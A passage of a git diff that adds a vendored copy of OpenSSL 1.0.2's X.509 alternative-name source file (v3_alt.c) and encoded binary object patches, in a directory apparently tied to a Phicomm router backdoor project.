zUNj-wI=^aPm_7f#<mq=rTyoVAU1wdienWX6x*xHAK=%5*&kViT^J}9M9y7%?9k#FY
zRW$!SnSW2>F+b+E=l_ry=GQ*iOl2Yq^ojz}g0(%0nJY6xzb%3Vv0pO7S&aAElpiGD
zH6h#Dzv6G$K&YMni{x)>plCb)Yvx7kSCtRMP07Rh;a`g8>;5mA8!1(3XefH7B>xfS
hxo6Mp9-3k~A-^N@@@qZI14a3J(*O6GDB3DV{{R6CA>IH0

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_alt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_alt.c
new file mode 100644
index 0000000..807867b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_alt.c
@@ -0,0 +1,607 @@
+/* v3_alt.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static GENERAL_NAMES *v2i_subject_alt(X509V3_EXT_METHOD *method,
+                                      X509V3_CTX *ctx,
+                                      STACK_OF(CONF_VALUE) *nval);
+static GENERAL_NAMES *v2i_issuer_alt(X509V3_EXT_METHOD *method,
+                                     X509V3_CTX *ctx,
+                                     STACK_OF(CONF_VALUE) *nval);
+static int copy_email(X509V3_CTX *ctx, GENERAL_NAMES *gens, int move_p);
+static int copy_issuer(X509V3_CTX *ctx, GENERAL_NAMES *gens);
+static int do_othername(GENERAL_NAME *gen, char *value, X509V3_CTX *ctx);
+static int do_dirname(GENERAL_NAME *gen, char *value, X509V3_CTX *ctx);
+
+const X509V3_EXT_METHOD v3_alt[] = {
+    {NID_subject_alt_name, 0, ASN1_ITEM_ref(GENERAL_NAMES),
+     0, 0, 0, 0,
+     0, 0,
+     (X509V3_EXT_I2V) i2v_GENERAL_NAMES,
+     (X509V3_EXT_V2I)v2i_subject_alt,
+     NULL, NULL, NULL},
+
+    {NID_issuer_alt_name, 0, ASN1_ITEM_ref(GENERAL_NAMES),
+     0, 0, 0, 0,
+     0, 0,
+     (X509V3_EXT_I2V) i2v_GENERAL_NAMES,
+     (X509V3_EXT_V2I)v2i_issuer_alt,
+     NULL, NULL, NULL},
+
+    {NID_certificate_issuer, 0, ASN1_ITEM_ref(GENERAL_NAMES),
+     0, 0, 0, 0,
+     0, 0,
+     (X509V3_EXT_I2V) i2v_GENERAL_NAMES,
+     NULL, NULL, NULL, NULL},
+};
+
+STACK_OF(CONF_VALUE) *i2v_GENERAL_NAMES(X509V3_EXT_METHOD *method,
+                                        GENERAL_NAMES *gens,
+                                        STACK_OF(CONF_VALUE) *ret)
+{
+    int i;
+    GENERAL_NAME *gen;
+    for (i = 0; i < sk_GENERAL_NAME_num(gens); i++) {
+        gen = sk_GENERAL_NAME_value(gens, i);
+        ret = i2v_GENERAL_NAME(method, gen, ret);
+    }
+    if (!ret)
+        return sk_CONF_VALUE_new_null();
+    return ret;
+}
+
+STACK_OF(CONF_VALUE) *i2v_GENERAL_NAME(X509V3_EXT_METHOD *method,
+                                       GENERAL_NAME *gen,
+                                       STACK_OF(CONF_VALUE) *ret)
+{
+    unsigned char *p;
+    char oline[256], htmp[5];
+    int i;
+    switch (gen->type) {
+    case GEN_OTHERNAME:
+        X509V3_add_value("othername", "<unsupported>", &ret);
+        break;
+
+    case GEN_X400:
+        X509V3_add_value("X400Name", "<unsupported>", &ret);
+        break;
+
+    case GEN_EDIPARTY:
+        X509V3_add_value("EdiPartyName", "<unsupported>", &ret);
+        break;
+
+    case GEN_EMAIL:
+        X509V3_add_value_uchar("email", gen->d.ia5->data, &ret);
+        break;
+
+    case GEN_DNS:
+        X509V3_add_value_uchar("DNS", gen->d.ia5->data, &ret);
+        break;
+
+    case GEN_URI:
+        X509V3_add_value_uchar("URI", gen->d.ia5->data, &ret);
+        break;
+
+    case GEN_DIRNAME:
+        X509_NAME_oneline(gen->d.dirn, oline, 256);
+        X509V3_add_value("DirName", oline, &ret);
+        break;
+
+    case GEN_IPADD:
+        p = gen->d.ip->data;
+        if (gen->d.ip->length == 4)
+            BIO_snprintf(oline, sizeof oline,
+                         "%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
+        else if (gen->d.ip->length == 16) {
+            oline[0] = 0;
+            for (i = 0; i < 8; i++) {
+                BIO_snprintf(htmp, sizeof htmp, "%X", p[0] << 8 | p[1]);
+                p += 2;
+                strcat(oline, htmp);
+                if (i != 7)
+                    strcat(oline, ":");
+            }
+        } else {
+            X509V3_add_value("IP Address", "<invalid>", &ret);
+            break;
+        }
+        X509V3_add_value("IP Address", oline, &ret);
+        break;
+
+    case GEN_RID:
+        i2t_ASN1_OBJECT(oline, 256, gen->d.rid);
+        X509V3_add_value("Registered ID", oline, &ret);
+        break;
+    }
+    return ret;
+}
+
+int GENERAL_NAME_print(BIO *out, GENERAL_NAME *gen)
+{
+    unsigned char *p;
+    int i;
+    switch (gen->type) {
+    case GEN_OTHERNAME:
+        BIO_printf(out, "othername:<unsupported>");
+        break;
+
+    case GEN_X400:
+        BIO_printf(out, "X400Name:<unsupported>");
+        break;
+
+    case GEN_EDIPARTY:
+        /* Maybe fix this: it is supported now */
+        BIO_printf(out, "EdiPartyName:<unsupported>");
+        break;
+
+    case GEN_EMAIL:
+        BIO_printf(out, "email:%s", gen->d.ia5->data);
+        break;
+
+    case GEN_DNS:
+        BIO_printf(out, "DNS:%s", gen->d.ia5->data);
+        break;
+
+    case GEN_URI:
+        BIO_printf(out, "URI:%s", gen->d.ia5->data);
+        break;
+
+    case GEN_DIRNAME:
+        BIO_printf(out, "DirName: ");
+        X509_NAME_print_ex(out, gen->d.dirn, 0, XN_FLAG_ONELINE);
+        break;
+
+    case GEN_IPADD:
+        p = gen->d.ip->data;
+        if (gen->d.ip->length == 4)
+            BIO_printf(out, "IP Address:%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
+        else if (gen->d.ip->length == 16) {
+            BIO_printf(out, "IP Address");
+            for (i = 0; i < 8; i++) {
+                BIO_printf(out, ":%X", p[0] << 8 | p[1]);
+                p += 2;
+            }
+            BIO_puts(out, "\n");
+        } else {
+            BIO_printf(out, "IP Address:<invalid>");
+            break;
+        }
+        break;
+
+    case GEN_RID:
+        BIO_printf(out, "Registered ID");
+        i2a_ASN1_OBJECT(out, gen->d.rid);
+        break;
+    }
+    return 1;
+}
+
+static GENERAL_NAMES *v2i_issuer_alt(X509V3_EXT_METHOD *method,
+                                     X509V3_CTX *ctx,
+                                     STACK_OF(CONF_VALUE) *nval)
+{
+    GENERAL_NAMES *gens = NULL;
+    CONF_VALUE *cnf;
+    int i;
+    if (!(gens = sk_GENERAL_NAME_new_null())) {
+        X509V3err(X509V3_F_V2I_ISSUER_ALT, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        cnf = sk_CONF_VALUE_value(nval, i);
+        if (!name_cmp(cnf->name, "issuer") && cnf->value &&
+            !strcmp(cnf->value, "copy")) {
+            if (!copy_issuer(ctx, gens))
+                goto err;
+        } else {
+            GENERAL_NAME *gen;
+            if (!(gen = v2i_GENERAL_NAME(method, ctx, cnf)))
+                goto err;
+            sk_GENERAL_NAME_push(gens, gen);
+        }
+    }
+    return gens;
+ err:
+    sk_GENERAL_NAME_pop_free(gens, GENERAL_NAME_free);
+    return NULL;
+}
+
+/* Append subject altname of issuer to issuer alt name of subject */
+
+static int copy_issuer(X509V3_CTX *ctx, GENERAL_NAMES *gens)
+{
+    GENERAL_NAMES *ialt;
+    GENERAL_NAME *gen;
+    X509_EXTENSION *ext;
+    int i;
+    if (ctx && (ctx->flags == CTX_TEST))
+        return 1;
+    if (!ctx || !ctx->issuer_cert) {
+        X509V3err(X509V3_F_COPY_ISSUER, X509V3_R_NO_ISSUER_DETAILS);
+        goto err;
+    }
+    i = X509_get_ext_by_NID(ctx->issuer_cert, NID_subject_alt_name, -1);
+    if (i < 0)
+        return 1;
+    if (!(ext = X509_get_ext(ctx->issuer_cert, i)) ||
+        !(ialt = X509V3_EXT_d2i(ext))) {
+        X509V3err(X509V3_F_COPY_ISSUER, X509V3_R_ISSUER_DECODE_ERROR);
+        goto err;
+    }
+
+    for (i = 0; i < sk_GENERAL_NAME_num(ialt); i++) {
+        gen = sk_GENERAL_NAME_value(ialt, i);
+        if (!sk_GENERAL_NAME_push(gens, gen)) {
+            X509V3err(X509V3_F_COPY_ISSUER, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+    sk_GENERAL_NAME_free(ialt);
+
+    return 1;
+
+ err:
+    return 0;
+
+}
+
+static GENERAL_NAMES *v2i_subject_alt(X509V3_EXT_METHOD *method,
+                                      X509V3_CTX *ctx,
+                                      STACK_OF(CONF_VALUE) *nval)
+{
+    GENERAL_NAMES *gens = NULL;
+    CONF_VALUE *cnf;
+    int i;
+    if (!(gens = sk_GENERAL_NAME_new_null())) {
+        X509V3err(X509V3_F_V2I_SUBJECT_ALT, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        cnf = sk_CONF_VALUE_value(nval, i);
+        if (!name_cmp(cnf->name, "email") && cnf->value &&
+            !strcmp(cnf->value, "copy")) {
+            if (!copy_email(ctx, gens, 0))
+                goto err;
+        } else if (!name_cmp(cnf->name, "email") && cnf->value &&
+                   !strcmp(cnf->value, "move")) {
+            if (!copy_email(ctx, gens, 1))
+                goto err;
+        } else {
+            GENERAL_NAME *gen;
+            if (!(gen = v2i_GENERAL_NAME(method, ctx, cnf)))
+                goto err;
+            sk_GENERAL_NAME_push(gens, gen);
+        }
+    }
+    return gens;
+ err:
+    sk_GENERAL_NAME_pop_free(gens, GENERAL_NAME_free);
+    return NULL;
+}
+
+/*
+ * Copy any email addresses in a certificate or request to GENERAL_NAMES
+ */
+
+static int copy_email(X509V3_CTX *ctx, GENERAL_NAMES *gens, int move_p)
+{
+    X509_NAME *nm;
+    ASN1_IA5STRING *email = NULL;
+    X509_NAME_ENTRY *ne;
+    GENERAL_NAME *gen = NULL;
+    int i;
+    if (ctx != NULL && ctx->flags == CTX_TEST)
+        return 1;
+    if (!ctx || (!ctx->subject_cert && !ctx->subject_req)) {
+        X509V3err(X509V3_F_COPY_EMAIL, X509V3_R_NO_SUBJECT_DETAILS);
+        goto err;
+    }
+    /* Find the subject name */
+    if (ctx->subject_cert)
+        nm = X509_get_subject_name(ctx->subject_cert);
+    else
+        nm = X509_REQ_get_subject_name(ctx->subject_req);
+
+    /* Now add any email address(es) to STACK */
+    i = -1;
+    while ((i = X509_NAME_get_index_by_NID(nm,
+                                           NID_pkcs9_emailAddress, i)) >= 0) {
+        ne = X509_NAME_get_entry(nm, i);
+        email = M_ASN1_IA5STRING_dup(X509_NAME_ENTRY_get_data(ne));
+        if (move_p) {
+            X509_NAME_delete_entry(nm, i);
+            X509_NAME_ENTRY_free(ne);
+            i--;
+        }
+        if (!email || !(gen = GENERAL_NAME_new())) {
+            X509V3err(X509V3_F_COPY_EMAIL, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        gen->d.ia5 = email;
+        email = NULL;
+        gen->type = GEN_EMAIL;
+        if (!sk_GENERAL_NAME_push(gens, gen)) {
+            X509V3err(X509V3_F_COPY_EMAIL, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        gen = NULL;
+    }
+
+    return 1;
+
+ err:
+    GENERAL_NAME_free(gen);
+    M_ASN1_IA5STRING_free(email);
+    return 0;
+
+}
+
+GENERAL_NAMES *v2i_GENERAL_NAMES(const X509V3_EXT_METHOD *method,
+                                 X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval)
+{
+    GENERAL_NAME *gen;
+    GENERAL_NAMES *gens = NULL;
+    CONF_VALUE *cnf;
+    int i;
+    if (!(gens = sk_GENERAL_NAME_new_null())) {
+        X509V3err(X509V3_F_V2I_GENERAL_NAMES, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        cnf = sk_CONF_VALUE_value(nval, i);
+        if (!(gen = v2i_GENERAL_NAME(method, ctx, cnf)))
+            goto err;
+        sk_GENERAL_NAME_push(gens, gen);
+    }
+    return gens;
+ err:
+    sk_GENERAL_NAME_pop_free(gens, GENERAL_NAME_free);
+    return NULL;
+}
+
+GENERAL_NAME *v2i_GENERAL_NAME(const X509V3_EXT_METHOD *method,
+                               X509V3_CTX *ctx, CONF_VALUE *cnf)
+{
+    return v2i_GENERAL_NAME_ex(NULL, method, ctx, cnf, 0);
+}
+
+GENERAL_NAME *a2i_GENERAL_NAME(GENERAL_NAME *out,
+                               const X509V3_EXT_METHOD *method,
+                               X509V3_CTX *ctx, int gen_type, char *value,
+                               int is_nc)
+{
+    char is_string = 0;
+    GENERAL_NAME *gen = NULL;
+
+    if (!value) {
+        X509V3err(X509V3_F_A2I_GENERAL_NAME, X509V3_R_MISSING_VALUE);
+        return NULL;
+    }
+
+    if (out)
+        gen = out;
+    else {
+        gen = GENERAL_NAME_new();
+        if (gen == NULL) {
+            X509V3err(X509V3_F_A2I_GENERAL_NAME, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+    }
+
+    switch (gen_type) {
+    case GEN_URI:
+    case GEN_EMAIL:
+    case GEN_DNS:
+        is_string = 1;
+        break;
+
+    case GEN_RID:
+        {
+            ASN1_OBJECT *obj;
+            if (!(obj = OBJ_txt2obj(value, 0))) {
+                X509V3err(X509V3_F_A2I_GENERAL_NAME, X509V3_R_BAD_OBJECT);
+                ERR_add_error_data(2, "value=", value);
+                goto err;
+            }
+            gen->d.rid = obj;
+        }
+        break;
+
+    case GEN_IPADD:
+        if (is_nc)
+            gen->d.ip = a2i_IPADDRESS_NC(value);
+        else
+            gen->d.ip = a2i_IPADDRESS(value);
+        if (gen->d.ip == NULL) {
+            X509V3err(X509V3_F_A2I_GENERAL_NAME, X509V3_R_BAD_IP_ADDRESS);
+            ERR_add_error_data(2, "value=", value);
+            goto err;
+        }
+        break;
+
+    case GEN_DIRNAME:
+        if (!do_dirname(gen, value, ctx)) {
+            X509V3err(X509V3_F_A2I_GENERAL_NAME, X509V3_R_DIRNAME_ERROR);
+            goto err;
+        }
+        break;
+
+    case GEN_OTHERNAME:
+        if (!do_othername(gen, value, ctx)) {
+            X509V3err(X509V3_F_A2I_GENERAL_NAME, X509V3_R_OTHERNAME_ERROR);
+            goto err;
+        }
+        break;
+    default:
+        X509V3err(X509V3_F_A2I_GENERAL_NAME, X509V3_R_UNSUPPORTED_TYPE);
+        goto err;
+    }
+
+    if (is_string) {
+        if (!(gen->d.ia5 = M_ASN1_IA5STRING_new()) ||
+            !ASN1_STRING_set(gen->d.ia5, (unsigned char *)value,
+                             strlen(value))) {
+            X509V3err(X509V3_F_A2I_GENERAL_NAME, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+
+    gen->type = gen_type;
+
+    return gen;
+
+ err:
+    if (!out)
+        GENERAL_NAME_free(gen);
+    return NULL;
+}
+
+GENERAL_NAME *v2i_GENERAL_NAME_ex(GENERAL_NAME *out,
+                                  const X509V3_EXT_METHOD *method,
+                                  X509V3_CTX *ctx, CONF_VALUE *cnf, int is_nc)
+{
+    int type;
+
+    char *name, *value;
+
+    name = cnf->name;
+    value = cnf->value;
+
+    if (!value) {
+        X509V3err(X509V3_F_V2I_GENERAL_NAME_EX, X509V3_R_MISSING_VALUE);
+        return NULL;
+    }
+
+    if (!name_cmp(name, "email"))
+        type = GEN_EMAIL;
+    else if (!name_cmp(name, "URI"))
+        type = GEN_URI;
+    else if (!name_cmp(name, "DNS"))
+        type = GEN_DNS;
+    else if (!name_cmp(name, "RID"))
+        type = GEN_RID;
+    else if (!name_cmp(name, "IP"))
+        type = GEN_IPADD;
+    else if (!name_cmp(name, "dirName"))
+        type = GEN_DIRNAME;
+    else if (!name_cmp(name, "otherName"))
+        type = GEN_OTHERNAME;
+    else {
+        X509V3err(X509V3_F_V2I_GENERAL_NAME_EX, X509V3_R_UNSUPPORTED_OPTION);
+        ERR_add_error_data(2, "name=", name);
+        return NULL;
+    }
+
+    return a2i_GENERAL_NAME(out, method, ctx, type, value, is_nc);
+
+}
+
+static int do_othername(GENERAL_NAME *gen, char *value, X509V3_CTX *ctx)
+{
+    char *objtmp = NULL, *p;
+    int objlen;
+    if (!(p = strchr(value, ';')))
+        return 0;
+    if (!(gen->d.otherName = OTHERNAME_new()))
+        return 0;
+    /*
+     * Free this up because we will overwrite it. no need to free type_id
+     * because it is static
+     */
+    ASN1_TYPE_free(gen->d.otherName->value);
+    if (!(gen->d.otherName->value = ASN1_generate_v3(p + 1, ctx)))
+        return 0;
+    objlen = p - value;
+    objtmp = OPENSSL_malloc(objlen + 1);
+    strncpy(objtmp, value, objlen);
+    objtmp[objlen] = 0;
+    gen->d.otherName->type_id = OBJ_txt2obj(objtmp, 0);
+    OPENSSL_free(objtmp);
+    if (!gen->d.otherName->type_id)
+        return 0;
+    return 1;
+}
+
+static int do_dirname(GENERAL_NAME *gen, char *value, X509V3_CTX *ctx)
+{
+    int ret;
+    STACK_OF(CONF_VALUE) *sk;
+    X509_NAME *nm;
+    if (!(nm = X509_NAME_new()))
+        return 0;
+    sk = X509V3_get_section(ctx, value);
+    if (!sk) {
+        X509V3err(X509V3_F_DO_DIRNAME, X509V3_R_SECTION_NOT_FOUND);
+        ERR_add_error_data(2, "section=", value);
+        X509_NAME_free(nm);
+        return 0;
+    }
+    /* FIXME: should allow other character types... */
+    ret = X509V3_NAME_from_section(nm, sk, MBSTRING_ASC);
+    if (!ret)
+        X509_NAME_free(nm);
+    gen->d.dirn = nm;
+    X509V3_section_free(ctx, sk);
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_alt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_alt.o
new file mode 100644
index 0000000000000000000000000000000000000000..bd5b6330301059c40ce579e16fe797b444502676
GIT binary patch
literal 15128
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
